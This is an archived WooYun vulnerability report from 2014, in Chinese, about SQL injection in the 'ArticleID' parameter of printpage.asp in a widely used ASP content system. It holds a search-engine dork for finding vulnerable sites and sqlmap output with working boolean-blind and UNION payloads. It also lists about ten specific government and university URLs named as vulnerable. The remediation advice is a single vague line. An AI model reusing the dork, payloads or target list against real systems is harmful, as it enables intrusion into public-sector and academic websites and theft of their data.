破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

某通用系统sql注入(影响大量学校、政府站点)

编号74884
Urlhttp://www.wooyun.org/bug.php?action=view&id=74884
漏洞状态已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞标题某通用系统sql注入(影响大量学校、政府站点)
漏洞类型
厂商某通用系统
白帽子xyang
提交日期2014-09-04 12:33:00
公开日期2014-12-03 12:34:00
修复时间(not set)
确认时间2014-09-09 00:00:00
Confirm Spend5
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank14
漏洞简介
sql注入漏洞,影响大量学校及政府站点
漏洞细节

baidu inurl:/printpage.asp?ArticleID


baidu.jpg


GET parameter 'ArticleID' is vulnerable. Do you want to keep testing the others (if any)? 
[y/N]
sqlmap identified the following injection points with a total of 47 HTTP(s) requests:
---
Place: GET
Parameter: ArticleID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ArticleID=2517 AND 7499=7499
Type: UNION query
Title: Generic UNION query (NULL) - 28 columns
Payload: ArticleID=-2851 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(97)&CHR(118)
&CHR(119)&CHR(113)&CHR(76)&CHR(97)&CHR(76)&CHR(98)&CHR(106)&CHR(122)&CHR(73)&CHR(68)&CHR(72)
&CHR(119)&CHR(113)&CHR(105)&CHR(111)&CHR(98)&CHR
(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM
MSysAccessObjects%16
---


测试了一部分站点

http://jiaojing.zkga.gov.cn/wscgs/printpage.asp?ArticleID=2517 周口市公安交警信息网
http://www.rzqzgz.gov.cn/printpage.asp?ArticleID=242 日照市委市政府信访局
http://xxjsq.qzkc.gov.cn/printpage.asp?id=60317&ArticleID=571 衢州柯城区府山街道县学街社区
http://www.gzmzw.gov.cn/printpage.asp?ArticleID=1286 赣州民政网
http://www.qxldj.gov.cn/printpage.asp?ArticleID=1122 迁西县人力资源和社会保障局
http://www.yichang.jcy.gov.cn/printpage.asp?ArticleID=888 宜昌市人民检察院
http://www.dag.zjut.edu.cn/Article/printpage.asp?ArticleID=29 浙江工业大学档案馆
http://lib.hbu.edu.cn/web2/printpage.asp?ArticleID=291 河北大学图书馆
http://pth.njfu.edu.cn/printpage.asp?ArticleID=188 南京林业大学语言文字网
http://www.lit.edu.cn/news/printpage.asp?ArticleID=8321 洛阳理工学院
......

POC

0E0T9C)2$FB333D%]70EKIV.jpg

6@`8D[J1E8}2H67MAGP2W32.jpg

jiaojing.jpg

修复方案

问题处在打印页面,参数增加过滤处理。。。

状态信息 2014-09-04: 细节已通知厂商并且等待厂商处理中
2014-09-09: 厂商已经确认,细节仅向厂商公开
2014-09-12: 细节向第三方安全合作伙伴开放
2014-11-03: 细节向核心白帽子及相关领域专家公开
2014-11-13: 细节向普通白帽子公开
2014-11-23: 细节向实习白帽子公开
2014-12-03: 细节向公众公开
厂商回复
回应信息危害等级:高漏洞Rank:14 确认时间:2014-09-09 08:51
Showing 1-5 of 5 items.
评论内容评论人点赞数评论时间

@U神 @r41n 汗!原来早就爆出来了,不过好像出漏洞的地方不一样啊

xyang02014-12-04 01:46:00

@U神 14 rank 好轻松。。。

r41n02014-12-03 23:00:00

@r41n http://www.cnhonkerarmy.com/thread-160827-1-1.html 果然很久了

U神02014-12-03 22:23:00

这个貌似很久很久了吧。。。

r41n02014-12-03 22:16:00

我觉得这是动易的

U神02014-12-03 14:19:00